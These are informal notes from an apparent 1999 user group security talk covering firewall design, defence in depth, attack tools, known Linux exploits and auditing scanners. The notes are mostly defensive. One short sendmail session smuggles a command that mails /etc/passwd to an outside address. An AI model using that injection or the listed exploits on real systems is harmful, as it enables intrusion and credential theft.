Taken by David Kramer
q+a
ns threads
Sun has Kerne threadsm fullyn multiprocessing
very little difference betweek kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.
George Peron(?sp) has small luggable pentiums
How can other companies offer DSL to yhou over your existing lines where the phone companyh can't?
Often they lie, and the can't
They offer slower speeds for poorer cables.
Announcements
next meet in 4-370 joint with AIP
Meeting-
Michael Hayes and Eric Cole of Vista Info Securities
eric.cole@vistait.com or eric7095@aol.com
slides will be at
http://www.blu.org/meetings/1999/dec/presentation.htm
Lots of F100 companies
pay less for networks and security than for cofee and soft drinks.
hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).
Lots of F100 companies have no security policies, or allow everything outbound.
"Depth of security"- like castles- Always rely on multiple levels of security, some of which are designed merely for detection, some are merly for slowing down attackers.
70% of attacks involve insiders.
AAA
Admin- passwords.
Authorizing- Control who can get to what.
Accounting- Recording who has done what.
Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.
Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.
He says this is a bad idea. Don't attract attention.
NT should never be used as a firewall. The OS itself is not secure enough.
Hardening- removing unwanted services, etc.
(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)
Don't put mail server in DMZ. Proxy it to the inside.
There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.
In Netscape, type link://kramer.ne.mediaone.net to find sites that link to your site.
www.grc.com Gibson Research.
Attack tools
WinNuke- Just type in IP address of Win95/98/NT box and this kills it. Connects to 139 NetBios. It sends out-of-band data that it's not expecting.
l0phtcrack.
sendmail
mail from: "/bin/mail me@host < /etc/passwd"
.. sender ok
rcpt to: mickeymouse
55o unknown user
data
354 enter mail .
Linux exploits
2.2 frag ICMP kernel panic
SDI-pop2 during IMAP anonymous_login() uid is nobody
SDI wu-ftp will let you execute commands as root if you have write access to the server
Sesquipedalian- DOS Linujx 2.1.89-2.2.3: zero-lenght fragment bug.
procrace- linux 2.2.1 contains a /prov race condition allowing local users to crash the kernel.
L2.0.36+ automount allows normal users to gain root via kernel overflow
Tools
Runs on host
IPChains/IPWFAMD
Specific rules first, more general rules later.
IPChains adds
portfw
chains, intricate rules
quality of service routing
ip/port/interface and not (!_
ipfwadm2ipchains
Mason- figures your rules by watching what you do.
netfilter
next gen packet firewalling
check.pl checks file/dir permissions/setuids.
cops (old)
tiger (under devel)
Runs outside
strobe- old port scanning tool
nmap
queso- checks for well-know attacks, not really a port scanner
nessus v.good scanning tools
Saint- like Satan
Cheops checks for OS vulnerabilities
ftpcheck/relaycheck checks for servers that relay
SARA Security Auditor's Research Assistant- like Satan.
BASS Bulk Auditing Security Scanner- Scan several servers.
Detection
tripwire